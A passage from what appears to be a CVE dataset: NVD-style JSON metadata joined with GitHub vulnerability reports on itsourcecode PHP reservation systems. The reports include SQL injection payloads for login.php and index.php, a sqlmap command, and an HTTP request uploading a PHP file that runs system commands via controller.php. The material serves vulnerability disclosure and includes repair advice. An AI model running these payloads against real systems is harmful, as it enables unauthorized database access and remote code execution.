"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wangyuan-ui/CVE/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.268857"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268857"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.358988"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wangyuan-ui/CVE/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.268857"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268857"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.358988"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:janobe:pool_of_bethesda_online_reservation_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9DE894B7-EE1B-4ABB-8881-CF3BA3911206",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/wangyuan-ui/CVE/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"wangyuan-ui",
"CVE"
] | # Itsourcecode Pool of Bethesda Online Reservation System Using PHP 1.0 login.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Pool of Bethesda Online Reservation System Using PHP
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/bakery-online-ordering-system/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ wangyuan-ui
## Vulnerable File
+ login.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2016/05/BethesdaReservation1.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'login.php' file of the 'Pool of Bethesda Online Reservation System Using PHP' project. The reason for this issue is that attackers inject malicious code from the parameter "email" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of "Pool of Bethesda Online Reservation System Using PHP", wangyuan-ui discovered a critical SQL injection vulnerability in the "login.php" file. This vulnerability stems from insufficient user input validation of the 'email' parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Vulnerability type:
+ boolean-based blind
+ time-based blind
## Vulnerability location:
+ 'email' parameter
## Payload:
```sql
email=111' AND 5012=(SELECT (CASE WHEN (5012=5012) THEN 5012 ELSE (SELECT 3533 UNION SELECT 3176) END))-- LJmv&pass=111&btnlogin=
email=111' AND (SELECT 4462 FROM (SELECT(SLEEP(5)))aBAN)-- LtcY&pass=111&btnlogin=
```
```makefile
Parameter: email (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: email=111' AND 5012=(SELECT (CASE WHEN (5012=5012) THEN 5012 ELSE (SELECT 3533 UNION SELECT 3176) END))-- LJmv&pass=111&btnlogin=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=111' AND (SELECT 4462 FROM (SELECT(SLEEP(5)))aBAN)-- LtcY&pass=111&btnlogin=
```
+ 
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
python sqlmap.py -u "http://localhost:8102/admin/login.php" --data="email=11&pass=11&btnlogin=" --method=POST --level=5 --risk=3 --batch --dbs
```
+ 
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Pool of Bethesda Online Reservation System Using PHP 1.0 login.php SQL injection | https://api.github.com/repos/wangyuan-ui/CVE/issues/1/comments | 0 | 2024-06-18T04:36:29Z | 2024-06-18T04:36:29Z | https://github.com/wangyuan-ui/CVE/issues/1 | 2,358,872,827 | 1 | 6,093 |
CVE-2024-6112 | 2024-06-18T13:15:52.550 | A vulnerability classified as critical was found in itsourcecode Pool of Bethesda Online Reservation System 1.0. This vulnerability affects unknown code of the file index.php. The manipulation of the argument log_email leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-268858 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wangyuan-ui/CVE/issues/2"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.268858"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268858"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.358990"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wangyuan-ui/CVE/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.268858"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268858"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.358990"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:janobe:pool_of_bethesda_online_reservation_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9DE894B7-EE1B-4ABB-8881-CF3BA3911206",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/wangyuan-ui/CVE/issues/2 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"wangyuan-ui",
"CVE"
] | # Itsourcecode Pool of Bethesda Online Reservation System Using PHP 1.0 index.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Pool of Bethesda Online Reservation System Using PHP
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/bakery-online-ordering-system/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ wangyuan-ui
## Vulnerable File
+ index.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2016/05/BethesdaReservation1.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'index.php' file of the 'Pool of Bethesda Online Reservation System Using PHP' project. The reason for this issue is that attackers inject malicious code from the parameter "log_email" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of "Pool of Bethesda Online Reservation System Using PHP", wangyuan-ui discovered a critical SQL injection vulnerability in the "index.php" file. This vulnerability stems from insufficient user input validation of the 'log_email' parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Vulnerability type:
+ boolean-based blind
+ time-based blind
+ UNION query
## Vulnerability location:
+ 'log_email' parameter
## Payload:
```sql
log_email=janu@yahoo.com' AND 9900=(SELECT (CASE WHEN (9900=9900) THEN 9900 ELSE (SELECT 5465 UNION SELECT 5753) END))-- -&log_pword=admin&login=
log_email=janu@yahoo.com' AND (SELECT 7888 FROM (SELECT(SLEEP(5)))fSab)-- lTbM&log_pword=admin&login=
log_email=janu@yahoo.com' UNION ALL SELECT 85,CONCAT(0x71787a7071,0x4343537349634a42714f41566d6c6a474b43576d57495a4f49484746517279766c7a676f67485563,0x716b707a71),85,85,85,85,85,85,85,85#&log_pword=admin&login=
```
```makefile
Parameter: log_email (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: log_email=janu@yahoo.com' AND 9900=(SELECT (CASE WHEN (9900=9900) THEN 9900 ELSE (SELECT 5465 UNION SELECT 5753) END))-- -&log_pword=admin&login=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: log_email=janu@yahoo.com' AND (SELECT 7888 FROM (SELECT(SLEEP(5)))fSab)-- lTbM&log_pword=admin&login=
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: log_email=janu@yahoo.com' UNION ALL SELECT 85,CONCAT(0x71787a7071,0x4343537349634a42714f41566d6c6a474b43576d57495a4f49484746517279766c7a676f67485563,0x716b707a71),85,85,85,85,85,85,85,85#&log_pword=admin&login=
```
+ 
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
python sqlmap.py -u "http://localhost:8102/admin/login.php" --data="email=11&pass=11&btnlogin=" --method=POST --level=5 --risk=3 --batch --dbs
```
+ 
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Pool of Bethesda Online Reservation System Using PHP 1.0 index.php SQL injection | https://api.github.com/repos/wangyuan-ui/CVE/issues/2/comments | 0 | 2024-06-18T04:39:57Z | 2024-06-18T04:40:28Z | https://github.com/wangyuan-ui/CVE/issues/2 | 2,358,881,049 | 2 | 6,094 |
CVE-2024-6114 | 2024-06-18T13:15:52.897 | A vulnerability classified as critical has been found in itsourcecode Monbela Tourist Inn Online Reservation System up to 1.0. Affected is an unknown function of the file controller.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268866 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wangyuan-ui/CVE/issues/4"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.268866"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268866"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.358995"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wangyuan-ui/CVE/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.268866"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268866"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.358995"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:janobe:monbela_tourist_inn_online_reservation_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E689E6B3-30E9-405A-A3AB-A5597F84A664",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/wangyuan-ui/CVE/issues/4 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"wangyuan-ui",
"CVE"
] | # Itsourcecode Monbela Tourist In Online Reservation System Using PHP 1.0 controller.php Unrestricted Upload
# NAME OF AFFECTED PRODUCT(S)
+ Monbela Tourist In Online Reservation System Using PHP
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/monbela-tourist-inn-online-reservation-system/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ wangyuan-ui
## Vulnerable File
+ controller.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2016/05/Monbela.zip
# PROBLEM TYPE
## Vulnerability Type
+ File upload
## Root Cause
+ In line 45 of the controller.php file, the input obtained through $-FILES is directly used to determine the storage location of the file without verification or cleaning. The specific code snippet is as follows:
+ 
## Impact
+ Attackers can exploit this vulnerability for unrestricted uploads, which may lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Remote attacks may also result in RCE
# DESCRIPTION
+ wangyuan-ui discovered that the file upload operation was triggered on line 164 of the 'controller.php' file and the uploaded file was received using the '$_FILES' variable. Due to the lack of appropriate input validation and cleaning, remote attackers can pass malicious payloads through this file upload feature, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE).
# Vulnerability details and POC
## Payload
##
```
POST /admin/mod_room/controller.php?action=add HTTP/1.1
Host: localhost:8103
Content-Length: 2782
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8103
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrKFZ95dXQZ0NftNp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8103/admin/mod_room/index.php?view=add
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryrKFZ95dXQZ0NftNp
Content-Disposition: form-data; name="ROOM"
11
------WebKitFormBoundaryrKFZ95dXQZ0NftNp
Content-Disposition: form-data; name="ACCOMID"
12
------WebKitFormBoundaryrKFZ95dXQZ0NftNp
Content-Disposition: form-data; name="ROOMDESC"
11
------WebKitFormBoundaryrKFZ95dXQZ0NftNp
Content-Disposition: form-data; name="NUMPERSON"
11
------WebKitFormBoundaryrKFZ95dXQZ0NftNp
Content-Disposition: form-data; name="PRICE"
11
------WebKitFormBoundaryrKFZ95dXQZ0NftNp
Content-Disposition: form-data; name="ROOMNUM"
11
------WebKitFormBoundaryrKFZ95dXQZ0NftNp
Content-Disposition: form-data; name="image"; filename="rce.php"
Content-Type: image/jpeg
Node: Sorry, due to some encoding reasons, I am unable to use Markdown to store image data with attack payloads here. I will take a screenshot to show
<?php system("ipconfig"); ?>
------WebKitFormBoundaryrKFZ95dXQZ0NftNp
Content-Disposition: form-data; name="save"
------WebKitFormBoundaryrKFZ95dXQZ0NftNp--
```
+ 
## I successfully executed the PHP script on the terminal
+  | Itsourcecode Monbela Tourist In Online Reservation System Using PHP 1.0 controller.php Unrestricted Upload | https://api.github.com/repos/wangyuan-ui/CVE/issues/4/comments | 0 | 2024-06-18T04:46:56Z | 2024-06-18T04:48:47Z | https://github.com/wangyuan-ui/CVE/issues/4 | 2,358,888,461 | 4 | 6,095 |
CVE-2024-6115 | 2024-06-18T13:15:53.267 | A vulnerability classified as critical was found in itsourcecode Simple Online Hotel Reservation System 1.0. Affected by this vulnerability is an unknown functionality of the file add_room.php. The manipulation of the argument photo leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268867. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
